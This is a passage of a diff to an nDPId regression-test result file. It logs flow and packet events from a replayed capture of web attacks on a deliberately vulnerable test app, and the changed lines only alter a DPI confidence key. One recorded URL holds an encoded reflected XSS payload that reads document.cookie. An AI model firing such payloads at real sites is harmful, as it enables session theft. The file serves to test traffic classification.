00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1499347355229,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GHxAAD4GrVSsEAABwKgKMtvyAFB7gnofAAAAAKACchApggAAAgQFtAQCCAoBOmJjAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1499347355229,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2\/L7jmGSe4J6IKAScSCVgwAAAgQFtAQCCAoD5DPYATpiYwEDAwc="} @@ -1220,7 +1220,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1499347357727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p9BAAD4GHgCsEAABwKgKMtwOAFCyy8MDAAAAAKACchCmyAAAAgQFtAQCCAoBOmTTAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1499347357727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3A4qYd\/GssvDBKAScSBjUgAAAgQFtAQCCAoD5DZJATpk0wEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1499347357728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347357728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p9FAAD4GHgesEAABwKgKMtwOAFCyy8MEKmHfx4AQAOUCWgAAAQEICgE6ZNMD5DZJ"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347360285,"flow_last_seen":1499347360285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347360285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1499347360285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h\/1AAD4GPdOsEAABwKgKMtwoAFB3hOCvAAAAAKACchDBygAAAgQFtAQCCAoBOmdSAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1499347360285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ci3TdMGd4TgsKAScSD7qAAAAgQFtAQCCAoD5DjIATpnUgEDAwc="} @@ -1449,8 +1449,8 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1499347423604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TspAAD4GdwasEAABwKgKMt7MAFD5I+viAAAAAKACchD0fQAAAgQFtAQCCAoBOqUoAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1499347423604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3szh681K+SPr46AScSDLowAAAgQFtAQCCAoD5HaeATqlKAEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1499347423605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347423605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TstAAD4Gdw2sEAABwKgKMt7MAFD5I+vj4evNS4AQAOVqqgAAAQEICgE6pSkD5Hae"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -1669,7 +1669,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1499347485533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaZAAD4GOCqsEAABwKgKMuFiAFALNGwFAAAAAKACchAjOgAAAgQFtAQCCAoBOuGjAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":2,"flow_last_seen":1499347485533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4WJ5n4cfCzRsBqAScSBsXQAAAgQFtAQCCAoD5LMYATrhowEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":3,"flow_last_seen":1499347485534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347485534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jadAAD4GODGsEAABwKgKMuFiAFALNGwGeZ+HIIAQAOULZQAAAQEICgE64aMD5LMY"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -1684,7 +1684,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1499347486787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D7tAAD4GthWsEAABwKgKMuFwAFB2mu1nAAAAAKACchA1KgAAAgQFtAQCCAoBOuLcAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":2,"flow_last_seen":1499347486787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4XA0h5CedprtaKAScSC4rAAAAgQFtAQCCAoD5LRSATri3AEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":3,"flow_last_seen":1499347486787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D7xAAD4GthysEAABwKgKMuFwAFB2mu1oNIeQn4AQAOVXtAAAAQEICgE64twD5LRS"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347489408,"flow_last_seen":1499347489408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347489408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1499347489408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86N5AAD4G3PGsEAABwKgKMuGKAFByXg2yAAAAAKACchAWcgAAAgQFtAQCCAoBOuVsAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":2,"flow_last_seen":1499347489408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4YpoWWpFcl4Ns6AScSCJ7AAAAgQFtAQCCAoD5LbhATrlbAEDAwc="} @@ -1896,7 +1896,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 